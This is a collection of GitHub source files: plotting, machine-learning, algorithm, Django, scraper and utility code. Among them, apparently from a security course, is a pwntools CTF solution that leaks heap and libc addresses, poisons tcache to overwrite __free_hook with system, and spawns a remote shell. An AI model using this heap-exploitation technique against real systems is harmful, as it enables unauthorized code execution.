xmin, xmax, r, e)\n else:\n df, n = gather_data(infile, xmin, xmax)\n\n # build the plot\n if all_species:\n if n > 10000: z = True\n else: z = None\n _ = fastANI_scatter_plot(\n df, n, 'All_species', outfile, xmin, xmax, xstep, p, a, z, g, c\n )\n if single_species:\n for species in df['species'].unique():\n print(f'\\tPlotting {species} ...')\n dfx = df[df['species'] == species]\n n = len(dfx)\n if n > 10000: z = True\n else: z = None\n if n >= 20:\n _ = fastANI_scatter_plot(\n dfx, n, species, outfile, xmin, xmax, xstep, p, a, z, g, c\n )\n \n print(f'\\n\\nComplete success space cadet!! Finished without errors.\\n\\n')\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"rotheconrad/bacterial_strain_definition","sub_path":"00b_Python/02a_fastANI_scatter_pyGAM.py","file_name":"02a_fastANI_scatter_pyGAM.py","file_ext":"py","file_size_in_byte":19376,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"24946959955","text":"import torch.nn as nn\nimport torch.nn.functional as F\nimport torch\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\"\"\"Cette classe de module de réseau de neurones est appelée \"Attention\", \n et elle est utilisée pour calculer l'attention sur les nœuds d'entrée donnés l'état courant.\"\"\"\n\n\nclass Attention(nn.Module):\n\n def __init__(self, hidden_size):\n super(Attention, self).__init__()\n\n self.v = nn.Parameter(torch.zeros((1, 1, hidden_size), device=device, requires_grad=True))\n\n self.W = nn.Parameter(torch.zeros((1, hidden_size, 3 * hidden_size), device=device, requires_grad=True))\n\n def forward(self, static_hidden, dynamic_hidden, decoder_hidden):\n batch_size, hidden_size, _ = static_hidden.size()\n\n hidden = decoder_hidden.unsqueeze(2).expand_as(static_hidden)\n hidden = torch.cat((static_hidden, dynamic_hidden, hidden), 1)\n\n v = self.v.expand(batch_size, 1, hidden_size)\n W = self.W.expand(batch_size, hidden_size, -1)\n\n attns = torch.bmm(v, torch.tanh(torch.bmm(W, hidden)))\n attns = F.softmax(attns, dim=2)\n return attns\n","repo_name":"mory-moussa/VRP","sub_path":"Model/Attention.py","file_name":"Attention.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"26639973330","text":"import cv2\nimport math\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom sklearn.cluster import KMeans\nfrom sklearn.decomposition import PCA\nfrom PIL import Image\n\n\ndef read_data_file(filename):\n \"\"\"\n Read the data file and split it by newline.\n \"\"\"\n with open(filename, 'r') as file:\n data = file.read().split(\"\\n\")\n return data\n\n\ndef preprocess_data(data):\n \"\"\"\n Preprocess the data by replacing tabs with commas and converting to floats.\n \"\"\"\n preprocessed_data = []\n for line in data:\n line = line.replace('\\t', ',')\n line = line.split(',')\n line = [float(x) for x in line]\n preprocessed_data.append(line)\n return preprocessed_data\n\n\n# Mass Alignment between to provide accurate representation of chemical\ndef collect_data_by_ablation_time(preprocessed_data, start_time, ablation_time):\n \"\"\"\n Collect data for each ablation time interval.\n \"\"\"\n collected_data = []\n current_time = start_time\n current_interval_data = []\n\n for line in preprocessed_data:\n if line[0] < current_time:\n continue\n elif current_time <= line[0] < current_time + ablation_time:\n current_interval_data.append(line)\n else:\n current_interval_data.append(line)\n collected_data.append(current_interval_data)\n current_time += ablation_time\n current_interval_data = []\n\n return collected_data\n\n\n# peak picking --> Being able to increase the singal to noise ratio while preserving all important features\ndef subtract_background_noise(collected_data, noise):\n \"\"\"\n Subtract background noise and calculate the sum of intensities for each interval.\n \"\"\"\n intensities = []\n interval_intensity = 0\n\n for interval in collected_data:\n for line in interval:\n intensity = max(line[1] - noise, 0)\n interval_intensity += intensity\n intensities.append(interval_intensity)\n interval_intensity = 0\n\n return intensities\n\n\n# implement the three steps of noise reduction here,\n\n\ndef scale_and_log_transform(intensities, ablation_times):\n \"\"\"\n Scale and perform logarithmic transformation on the intensities.\n \"\"\"\n scaled_intensities = np.zeros(ablation_times)\n\n for i in range(min(len(scaled_intensities), len(intensities))):\n if intensities[i] > 0:\n scaled_intensities[i] = math.log(intensities[i], 10)\n\n return scaled_intensities\n\n\ndef reshape_data_for_visualization(scaled_intensities, length):\n \"\"\"\n Reshape the data for image visualization.\n \"\"\"\n reshaped_data = []\n\n for i in range(0, len(scaled_intensities), length):\n reshaped_data.append(scaled_intensities[i:i + length])\n\n return reshaped_data\n\n\ndef reverse_alternate_rows(reshaped_data):\n \"\"\"\n Reverse alternate rows in the reshaped data.\n \"\"\"\n reversed_data = []\n\n for i in range(len(reshaped_data)):\n if i % 2 == 0:\n reversed_data.append(reshaped_data[i])\n else:\n reversed_data.append(reshaped_data[i][::-1])\n\n return reversed_data\nfrom matplotlib.colors import LinearSegmentedColormap\n\n\ndef transparent_colormap(existing_cmap_name = 'jet'):\n ncolors = 256\n color_array = plt.get_cmap(existing_cmap_name)(range(ncolors))\n\n # change alpha value of first color\n color_array[0,-1] = 0.0\n\n # create a colormap object\n new_cmap = LinearSegmentedColormap.from_list(name=f'{existing_cmap_name}_alpha', colors=color_array)\n\n # register this new colormap with matplotlib\n plt.register_cmap(cmap=new_cmap)\n \n return new_cmap\n\n\ndef save_image(reshaped_data, filename):\n \"\"\"\n Save the mass spectrometry image as an image file.\n \"\"\"\n image = np.array(reshaped_data)\n new_cmap = transparent_colormap()\n plt.imsave(filename, image, cmap=new_cmap)\n\n\n\n\ndef display_image_with_colorbar(reshaped_data):\n \"\"\"\n Display the mass spectrometry image with a colorbar.\n \"\"\"\n image = np.array(reshaped_data)\n plt.imshow(image, cmap=\"jet\")\n plt.colorbar(label='log(Signal intensity [arb. units])')\n plt.xticks([0, 25, 50, 75, 100], [0, 1, 2, 3, \"4\\nmm\"], fontsize=20)\n plt.yticks([0, 25, 50, 75, 100], [\"4\\nmm\", 3, 2, 1, 0], fontsize=20)\n plt.show()\n\n\ndef perform_kmeans_clustering(reshaped_data, num_clusters):\n \"\"\"\n Perform k-means clustering on the reshaped data.\n \"\"\"\n flattened_data = np.array(reshaped_data).flatten()\n kmeans = KMeans(n_clusters=num_clusters)\n kmeans.fit(flattened_data.reshape(-1, 1))\n cluster_labels = kmeans.labels_\n return cluster_labels\n\ndef perform_pca(data):\n # Initialize PCA with desired number of components\n pca = PCA(n_components=2)\n \n # Perform PCA on the data\n pca_data = pca.fit_transform(data)\n \n return pca_data\n\n\ndef main():\n # Specify input data and parameters\n IMS_data = 'ToFData\\\\230111_caffeini_3_195_1.txt'\n AbrationTime = 0.05054\n StartTime = 1.0\n Noise = 50\n Length = 100\n AbrationTimes = 10000\n\n # Step 1: Read the data file\n data = read_data_file(IMS_data)\n\n # Step 2: Preprocess the data\n preprocessed_data = preprocess_data(data)\n\n # Step 3: Collect data for each ablation time interval\n collected_data = collect_data_by_ablation_time(preprocessed_data, StartTime, AbrationTime)\n\n # Step 4: Subtract background noise and calculate intensities\n intensities = subtract_background_noise(collected_data, Noise)\n\n # Step 5: Scale and perform logarithmic transformation\n scaled_intensities = scale_and_log_transform(intensities, AbrationTimes)\n \n # Perform PCA on the scaled intensities\n #pca_data = perform_pca(np.resscaled_intensities)\n\n # Step 6: Reshape the data for visualization\n reshaped_data = reshape_data_for_visualization(scaled_intensities, Length)\n\n # Step 7: Reverse alternate rows\n reversed_data = reverse_alternate_rows(reshaped_data)\n\n\n # Perform k-means clustering on the reshaped data\n cluster_labels = perform_kmeans_clustering(reversed_data, 100)\n\n # Generate x and y coordinate arrays based on the shape of reversed_data\n x, y = np.meshgrid(np.arange(len(reversed_data[0])), np.arange(len(reversed_data)))\n\n # Plot K-means clustering results\n plt.scatter(x.flatten(), y.flatten(), c=cluster_labels, cmap='jet')\n plt.xlabel('X')\n plt.ylabel('Y')\n plt.title('K-means Clustering Results')\n plt.colorbar(label='Cluster Labels')\n plt.show()\n\n # Step 8: Save the mass spectrometry image\n save_image(reversed_data, 'MSI_image.bmp')\n\n # Step 9: Display the mass spectrometry image with colorbar\n display_image_with_colorbar(reversed_data)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"VarunSendilraj/MassSpecProj","sub_path":"OrignalCode/optimizedScript_V2.py","file_name":"optimizedScript_V2.py","file_ext":"py","file_size_in_byte":6750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74795326665","text":"'''\nmain idea: recursion + memo\ntime comp: O(nd)\nspace comp: O(n)\n- where n is the target amount and d is the length of the denoms\n'''\ndef minNumberOfCoinsForChange(n, denoms):\n # Write your code here.\n\tmemo = {}\n\tdef recr(amount, idx):\n\t\tnonlocal ans\n\t\t\n\t\tif amount == 0:\n\t\t\treturn 0\n\t\t\n\t\tif idx >= len(denoms) or amount < 0:\n\t\t\treturn float('inf')\n\t\t\n\t\tif (amount, idx) not in memo:\n\t\t\tret = recr(amount, idx+1)\n\t\t\tfor i in range(1, amount // denoms[idx] + 1):\n\t\t\t\tret = min(ret, i + recr(amount - i*denoms[idx], idx+1))\n\t\t\tmemo[amount, idx] = ret\n\t\treturn memo[amount, idx]\n\t\n\tans = recr(n, 0) \n\treturn ans if ans < float('inf') else -1\n","repo_name":"novayo/LeetCode","sub_path":"AlgoExpert/coding_interview_questions/Dynamic_Programming/Min_Number_Of_Coins_For_Change.py","file_name":"Min_Number_Of_Coins_For_Change.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"81"} +{"seq_id":"27516897104","text":"class Solution:\n def findRadius(self, houses, heaters):\n \"\"\"\n :type houses: List[int]\n :type heaters: List[int]\n :rtype: int\n \"\"\"\n # 这题对边界的处理感觉很巧妙,我自己想不出来,这题是直接搬的答案\n houses.sort()\n heaters.sort()\n radius, i = 0, 0\n for house in houses:\n while i < len(heaters) and heaters[i] < house:\n i += 1\n if i == 0:\n radius = max(radius, heaters[i] - house)\n elif i == len(heaters):\n radius = max(radius, houses[-1] - heaters[-1])\n else:\n radius = max(radius, min(house - heaters[i-1], heaters[i] - house))\n return radius","repo_name":"mancunian100/leetcode","sub_path":"easy/Python/475Heaters.py","file_name":"475Heaters.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"35116453761","text":"\r\nfrom pwn import *\r\nimport sys\r\n\r\ncontext.arch = 'amd64'\r\ncontext.terminal = ['tmux', 'splitw', '-h']\r\n\r\n# r = process('./easyheap')\r\nr = remote('edu-ctf.zoolab.org', 30211)\r\n\r\ndef add_book(idx, name_len, name, price):\r\n r.sendlineafter(\"> \", str(1))\r\n r.sendlineafter(\"Index: \", str(idx))\r\n r.sendlineafter(\"name: \", str(name_len))\r\n r.sendafter(\"Name: \", name)\r\n r.sendlineafter(\"Price: \", str(price))\r\n\r\n\r\n\r\ndef delete_book(idx):\r\n r.sendlineafter(\"> \", str(2))\r\n r.sendlineafter(\"delete: \", str(idx))\r\n\r\n\r\ndef edit_book(idx, name, price):\r\n \r\n r.sendlineafter(\"> \", str(3))\r\n\r\n r.sendlineafter(\"edit: \", str(idx))\r\n r.sendafter(\"Name: \", name)\r\n r.sendlineafter(\"Price: \", str(price))\r\n \r\n\r\ndef list_book():\r\n r.sendlineafter(\"> \", str(4))\r\n\r\ndef get_name_from_idx(idx):\r\n r.sendlineafter(\"> \", str(5))\r\n r.sendlineafter(\"Index: \", str(idx))\r\n\r\n\r\n \r\n\r\n# 1. Leak heap address\r\ndef leak_heap_addr():\r\n add_book(0, 0x410, 'mark', 300)\r\n add_book(1, 0x410, 'mobiln', 300)\r\n\r\n delete_book(0)\r\n list_book()\r\n r.recvuntil(\"Index:\\t\")\r\n test_addr = r.recvuntil(\"\\n\")\r\n heap_addr = int(test_addr[:-1]) - 0x10\r\n # print(hex(test_addr[:-1]))\r\n print(hex(heap_addr))\r\n return heap_addr\r\n\r\n# 1. Leak heap & libc address\r\ndef leak_libc_addr():\r\n add_book(0, 0x410, 'mark', 300)\r\n add_book(1, 0x20, 'mark', 300)\r\n add_book(2, 0x410, 'mark', 300)\r\n add_book(3, 0x10, 'mark', 300)\r\n\r\n delete_book(0)\r\n delete_book(1)\r\n\r\n delete_book(2)\r\n\r\n get_name_from_idx(1)\r\n\r\n r.recvuntil(\"Name: \")\r\n a = r.recvline()\r\n heap_A = int.from_bytes(a[:-1], 'little')\r\n # print(hex(heap_A))\r\n target = heap_A + 0x30\r\n # print(hex(target))\r\n heap_base = heap_A - 0x2a0\r\n print(\"Heap base: \", heap_base)\r\n\r\n edit_book(2, p64(target), 500)\r\n get_name_from_idx(1)\r\n r.recvuntil(\"Name: \")\r\n a = r.recvline()\r\n main_arena = int.from_bytes(a[:-1], 'little')\r\n libc = main_arena - 0x1ebbe0\r\n print(\"libc: \", hex(libc))\r\n\r\n return heap_base, libc\r\n\r\ndef exploit(heap_base, libc_base, free_hook, _system):\r\n # add new chunk 3 to tcache\r\n delete_book(3)\r\n # change C's name pointer to B\r\n add_book(4, 0x28, p64(heap_base + 0x6f0), 300)\r\n print(hex(heap_base+0x6f0))\r\n edit_book(2, p64(free_hook - 8), 300)\r\n\r\n # modify free_hook to system\r\n add_book(5, 0x28, b'/bin/sh\\x00' + p64(_system), 300)\r\n\r\n # get shell from release\r\n delete_book(5)\r\n r.interactive()\r\n\r\nheap_base, libc_base = leak_libc_addr()\r\nfree_hook = libc_base + 0x1eeb28\r\n_system = libc_base + 0x55410\r\nprint(\"free hook: \", hex(free_hook))\r\nprint(\"system: \", hex(_system))\r\n\r\nexploit(heap_base, libc_base, free_hook, _system)\r\n\r\n","repo_name":"CyCTW/NTU-ComputerSecurity-110","sub_path":"pwn/pwnbox/easyheap/share/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":2742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"7131636030","text":"from django.shortcuts import render\nfrom .forms import AudioForm\nfrom .processingAudio import Amplitude,spectogram,silence,emotionOutput\n\ndef home(request):\n if request.method == 'POST':\n form = AudioForm(request.POST,request.FILES)\n if form.is_valid():\n audio_name = form.cleaned_data['audio']\n ans = emotionOutput(audio_name)\n out = ans.split('_')\n context = {\n 'amp': Amplitude(audio_name),\n 'sep': spectogram(audio_name),\n 'sil': silence(audio_name),\n 'gen' : out[0],\n 'emo' : out[1],\n }\n return render(request, 'audio/out.html', context)\n\n else:\n form = AudioForm()\n\n return render(request, 'audio/main.html', {'form': form})\n\n\ndef test(request):\n return render(request,'base.html')\n","repo_name":"parthrr510/AudioAnalyser","sub_path":"audio/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"3024264188","text":"\"\"\"adding Movie table back with new movie_id column\n\nRevision ID: fa6f55c6e6cb\nRevises: 9decc63fffe2\nCreate Date: 2022-04-05 10:52:25.026836\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'fa6f55c6e6cb'\ndown_revision = '9decc63fffe2'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('movie',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('movie', sa.PickleType(), nullable=False),\n sa.Column('movie_id', sa.Integer(), nullable=False),\n sa.Column('user_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('movie')\n # ### end Alembic commands ###\n","repo_name":"ggroshansii/movie-date-app","sub_path":"api/migrations/versions/fa6f55c6e6cb_adding_movie_table_back_with_new_movie_.py","file_name":"fa6f55c6e6cb_adding_movie_table_back_with_new_movie_.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"18137491181","text":"#! /usr/bin/python\n# -*- coding: iso-8859-15 -*-\nfrom pylab import *\nimport matplotlib.pyplot as plt \nfrom matplotlib import * \nimport numpy as np\nperiodo = 0.5\n\n# Definimos el array dimensional\nx = np.linspace(0, 2, 1000)\n\n# Definimos la función senoidal\ny = np.sin(2*np.pi*x/periodo)\n\n# Creamos la figura\nplt.figure()\n\n# Dibujamos en negro discontinuo con etiqueta y1\nplt.plot(x, y, 'k--', linewidth = 2, label = 'y1')\n\n# Mantenemos la misma figura parta la siguiente gráfica\nplt.hold(True)\n\n# Esta vez dibujamos - y en rojo co etiqueta y2\nplt.plot(x,-y,'r', linewidth = 2, label = 'y2')\n\n# Añadimos la leyenda\nplt.legend(loc = 2)\n\n# Añadimos las etiquetas poniermo en Latex \"mu\" símbolo de micras\nplt.xlabel(r\"$x (\\mu m)$\", fontsize = 24, color = (1,0,0))\nplt.ylabel(r\"$y (\\mu m)$\", fontsize = 24, color = 'blue')\n\n# Añadimos texto\nplt.text(x = 1, y = 0.0, s = u'T = 0.05', fontsize = 24)\n\n# Añadimos la rejilla\nplt.grid(True)\nplt.grid(color = '0.5', linestyle = '--', linewidth = 1)\n\n# Añadimos los ejes\nplt.axis('tight')\n\n# Añadimos el título \nplt.title('(a)',fontsize = 28, color = '0.75', verticalalignment = 'baseline', horizontalalignment = 'center')\n\n# Guardamos\nplt.savefig('plotCompleta.png')\n\t\n# Mostramos en pantalla\nplt.show()","repo_name":"julioh/python-chile","sub_path":"graficos1.py","file_name":"graficos1.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"32398617647","text":"r\"\"\"\n _ __ \n ___ _ __ | | _ _ / _| __ _ _ __ ___ ___ ___ _ __ __ _ _ __ ___ _ __ \n / _ \\ | '_ \\ | || | | || |_ / _` || '_ \\ / __| _____ / __| / __|| '__| / _` || '_ \\ / _ \\| '__|\n| (_) || | | || || |_| || _|| (_| || | | |\\__ \\|_____|\\__ \\| (__ | | | (_| || |_) || __/| | \n \\___/ |_| |_||_| \\__, ||_| \\__,_||_| |_||___/ |___/ \\___||_| \\__,_|| .__/ \\___||_| \n |___/ |_| \n\"\"\"\n\nimport httpx\n\nfrom ..constants import messagesEP, messagesNextEP\nfrom ..utils import auth\n\n\ndef scrape_messages(headers, user_id, message_id=0) -> list:\n ep = messagesNextEP if message_id else messagesEP\n url = ep.format(user_id, message_id)\n\n with httpx.Client(http2=True, headers=headers) as c:\n auth.add_cookies(c)\n c.headers.update(auth.create_sign(url, headers))\n\n r = c.get(url, timeout=None)\n if not r.is_error:\n messages = r.json()['list']\n if not messages:\n return messages\n messages += scrape_messages(headers, user_id, messages[-1]['id'])\n return messages\n r.raise_for_status()\n\n\ndef parse_messages(messages: list, user_id):\n messages_with_media = [(message['media'], message['createdAt'])\n for message in messages if message['fromUser']['id'] == user_id and message['media']]\n\n messages_urls = []\n for message in messages_with_media:\n media, date = message\n for m in media:\n if m['canView']:\n messages_urls.append((m['src'], date, m['id'], m['type']))\n\n return messages_urls\n","repo_name":"taux1c/onlyfans-scraper","sub_path":"onlyfans_scraper/api/messages.py","file_name":"messages.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"en","doc_type":"code","stars":273,"dataset":"github-code","pt":"81"} +{"seq_id":"29703668216","text":"__author__ = 'japaz'\n\nimport literals\n\n# General elements\nCL_NAME = 1\n\n# Heads\nCL_HEAD_OBJECT = 1001\n\ninfo = {\n CL_HEAD_OBJECT: {\n 'description':'expresion for object entry head'\n },\n CL_NAME:{\n 'description':'regular expresión for a free name'\n }\n}\n\nexpressions = {\n CL_HEAD_OBJECT:'{CL_NAME} [CL_IS] [CL_OBJECT]'\n }","repo_name":"Johan-Paz/claws","sub_path":"compiler/elements.py","file_name":"elements.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"72072014665","text":"from sklearn.impute import SimpleImputer\nfrom sklearn.preprocessing import LabelEncoder\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\ndf_titanic = pd.read_csv('./content/test.csv')\n\n# Identificar datos ausentes en datos tabulares\nprint(f\"Identificar ausentes en datos tabulares:\\n {df_titanic.isnull().sum()}\")\n\nprint(f\"Eliminar muestras o caracteristicas con valores ausentes:\\n{df_titanic.dropna()}\")\n\nimr = SimpleImputer(strategy=\"most_frequent\")\nimr = imr.fit(df_titanic.values)\nimputed_data = imr.transform(df_titanic.values)\n\nprint(f\"Imputar datos ausentes:\\n{imputed_data}\")\n\nsex_mapping = { label:idx for idx, label in enumerate(np.unique(df_titanic['Sex']))}\ndf_titanic['Sex'] = df_titanic['Sex'].map(sex_mapping)\nembarked_mapping = { label:idx for idx, label in enumerate(np.unique(df_titanic['Embarked']))}\ndf_titanic['Embarked'] = df_titanic['Embarked'].map(embarked_mapping)\n\n# Con este codigo códicariamos la caracteristicas ordinales\n# pclass_mapping = {\n# \"First class\": 1, \n# \"Second class\": 2,\n# \"Third Class\": 3\n# }\n\n# df_titanic['PClass'] = df_titanic['PClass'].map(pclass_mapping)\n\n\n#codificacion\nprint(f\"Codificar etiquetas de clase\\n: ${df_titanic}\")\n\ndatosCodificados = pd.get_dummies(df_titanic['Embarked'])\n\ndf_titanic = pd.concat([df_titanic, datosCodificados], axis=1)\n\nprint(f\"Realizar una codificación en caliente sobre características nominales\\n: ${df_titanic}\")\n\n# Eliminar columnas no numéricas irrelevantes\ndf_titanic = df_titanic.drop(['Name', 'Ticket', 'Cabin'], axis=1)\n\n# Cálculo de la matriz de correlación\ncorrelation_matrix = df_titanic.corr()\n\n# Visualización de la matriz de correlación\nplt.figure(figsize=(10, 8))\nsns.heatmap(correlation_matrix, annot=True, cmap='coolwarm')\nplt.title('Matriz de correlación')\nplt.show()\n\n# Análisis de la matriz de correlación\nprint(\"Matriz de correlación:\")\nprint(correlation_matrix)","repo_name":"castolo1/AI","sub_path":"TP 2/Ejercicio 5.py","file_name":"Ejercicio 5.py","file_ext":"py","file_size_in_byte":1934,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"37264426917","text":"import numpy as np\nimport glob\nfrom matplotlib import pyplot as plt\nfrom matplotlib.colors import LogNorm\nimport datetime as dt\nfrom scipy.optimize import minimize,leastsq\n\nf1 = glob.glob('D:/tmp/sun_photo/*04b.jpg')[0];\nf2 = glob.glob('D:/tmp/sun_photo/*04a.jpg')[0];\n\nframe1=plt.imread(f1)[10:-10,10:-10,:].astype('float32'); \nframe2=plt.imread(f2)[10:-10,10:-10,:].astype('float32'); \n#fig,ax=plt.subplots(2,1,sharex=True, sharey=True); ax[0].imshow(frame1[:,200:-200,0]); \n#ax[1].imshow(frame2[:,200:-200,0]); \n\nflag=np.all((frame1[:,:,0]>5,frame1[:,:,0]<245,frame2[:,:,0]>5,frame2[:,:,0]<245),axis=0);\nplt.figure(); cnt,x,y,fig=plt.hist2d(frame2[flag,0].ravel(),frame1[flag,0].ravel(),bins=255,norm=LogNorm());\n#cnt,x,y=np.histogram2d(frame2[flag,0].ravel(),frame1[flag,0].ravel(),bins=255);\n \nfoo=y[np.argmax(cnt,1)]; \nzind=np.nonzero(np.diff(foo)<=-9); zind=zind[0]; zind+=1; foo[zind]=0.5*(foo[zind+1]+foo[zind-1]);\nif sum(foo>238)>=1:\n cut=np.min(np.nonzero(foo>238)); \nelse:\n cut=foo.shape[0];\nplt.plot(x[:cut],foo[:cut]); plt.title('Scatter plot of image RED intensity for 1/60 and 1/30 exposures');\nM=x[:cut]/255; MP=foo[:cut]/255; \n\n#def cost(x):\n# return np.sum((1+x[0]*M+x[1]*M**2+x[2]*M**3- \\\n# a*(1+x[0]*MP+x[1]*MP**2+x[2]*MP**3))**2);\n#res = minimize(cost, [0.1,0.01,0.001], method='nelder-mead', \\\n# options={'xtol': 1e-8, 'disp': True});\n#ss=res.x;\n\ndef resid(x,a=1,M=1,MP=1):\n p=np.poly1d(list(x[::-1])+[1-sum(x)]);\n return p(M)- a*p(MP); \n#for a in [1,1.5,1.7,2,2.2,2.5,3.0,4.0,5.0,8.0]: \nfor a in [0.5]: \n a=1.0/a;\n ss=leastsq(resid,[0.1]*6,args=(a,M,MP))[0];\n print(a,ss,np.linalg.norm(resid(ss,a,M,MP))); \n plt.figure(); plt.plot(M,np.poly1d(list(ss[::-1])+[1-sum(ss)])(M));\n plt.xlabel(\"RED intensity\"); plt.ylabel(\"Normalized Irradiance\"); plt.title('Camera Response Function');","repo_name":"BNL-NowCasting/SolarForecasting","sub_path":"code/calibration/sun_photo.py","file_name":"sun_photo.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"70148469706","text":"# coding=utf-8\n\nclass UnionFind(object):\n def __init__(self):\n self.leader = dict()\n self.followers = dict()\n self.clusters = 0\n\n def add(self, node):\n assert node not in self.leader\n assert node not in self.followers\n\n self.leader[node] = node\n self.followers.setdefault(node, set())\n self.clusters += 1\n\n def union(self, v0, v1):\n v0 = self.leader[v0]\n v1 = self.leader[v1]\n if v0 == v1:\n return\n\n f0 = len(self.followers[v0])\n f1 = len(self.followers[v1])\n\n src = v0 if min(f0,f1) == f0 else v1\n dst = v1 if src == v0 else v0\n\n for node in self.followers[src]:\n self.leader[node] = dst\n self.followers[dst].add(node)\n del self.followers[src]\n self.leader[src] = dst\n self.clusters -= 1\n return dst\n\n def find(self, node):\n return self.leader[node]\n","repo_name":"bjorns/algo","sub_path":"lib/unionfind.py","file_name":"unionfind.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"6882611883","text":"def convert_to_bytes(num, bol, str):\n num = int(num)\n if bol == \"True\":\n bol = True\n else:\n bol = False\n\n # print(type(bol), bol)\n\n b_num = bytes(num)\n print(f'-- The int value is \"{num}\"\\nbytes: \"{b_num}\"')\n b_bol = bytes(bol)\n print(f'-- The bool value is \"{bol}\"\\nbytes: \"{b_bol}\"')\n b_str = str.encode()\n print(f'-- The string value is \"{str}\"\\nbytes: \"{b_str}\"')\n\n\n# if __name__ == '__main__':\n# convert_to_bytes('10', 'False', 'aaa')\n# print('******')\n# convert_to_bytes('5', 'True', 'Are you suggesting that coconuts migrate?')","repo_name":"ykyselv/python_marathon","sub_path":"sprint01/t09/bytes.py","file_name":"bytes.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"35389569546","text":"import logging\nimport sys\nfrom logging.handlers import TimedRotatingFileHandler\nimport os\nimport setting\n\nFORMATTER = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s — %(funcName)s:%(lineno)d - %(message)s')\nLOG_FILE = os.path.join(setting.data_dir_interim, setting.log_filename)\nLOGGER_NAME = \"nyc_data\"\n\n\ndef get_console_handler():\n console_handler = logging.StreamHandler(sys.stdout)\n console_handler.setFormatter(FORMATTER)\n return console_handler\n\n\ndef get_file_handler():\n file_handler = TimedRotatingFileHandler(LOG_FILE, when='midnight')\n file_handler.setFormatter(FORMATTER)\n return file_handler\n\n\ndef get_logger(logger_name):\n logger = logging.getLogger(logger_name)\n\n # better to have too much log than not enough\n logger.setLevel(logging.INFO)\n\n logger.addHandler(get_console_handler())\n logger.addHandler(get_file_handler())\n\n return logger\n","repo_name":"mailshanx/nyc_data","sub_path":"src/utils/log_config.py","file_name":"log_config.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"20269292058","text":"from .base import Board as BaseBoard\nfrom machine import Pin\n\nclass Board(BaseBoard):\n\n def init(self):\n self.init_ssd1306i2c(\n reset_pin=self.init_pin(16, \"Display Reset\", Pin.OUT),\n scl_pin=self.init_pin(15, \"Display SCL\"),\n sda_pin=self.init_pin(4, \"Display SDA\"),\n )\n\n out_mapping = {\n \"1-1\": 25,\n \"1-3\": 12,\n \"1-5\": 13,\n \"2-1\": 17,\n \"2-3\": 2,\n \"2-5\": 23,\n \"2-7\": 22,\n \"4-1\": 0\n }\n for name, num in out_mapping.items():\n self.init_pin(num, name, Pin.OUT)\n\n in_mapping = {\n \"5-1\": 34,\n \"5-3\": 35,\n \"5-5\": 32,\n \"5-7\": 33,\n }\n for name, num in in_mapping.items():\n self.init_pin(num, name, Pin.IN)\n","repo_name":"ewaldshof/ewhome","sub_path":"firmware/board/bohei.py","file_name":"bohei.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"9153577134","text":"from django.utils import timezone\nfrom rest_framework import serializers\n\nfrom polls.models import Poll, Question, Answer, UserAnswer, UserPoll\nfrom utils.constants import POLL_MINIMUM_DURATION_MINUTES, POLL_MINIMUM_DURATION_ERROR, START_DATE_CANNOT_BE_CHANGED, \\\n START_DATE_EARLIER_THAN_NOW, WRONG_QUESTION_ID, ANSWER_NOT_ALLOWED, \\\n CANNOT_CREATE_MULTIPLE_ANSWERS, CANNOT_ANSWER_FOR_ANOTHER_USER, QUESTION_CANNOT_BE_CHANGED, \\\n USER_POLL_CANNOT_BE_CHANGED, CANNOT_CREATE_ANSWER\nfrom utils.serializers import ChoicesField\n\n\nclass 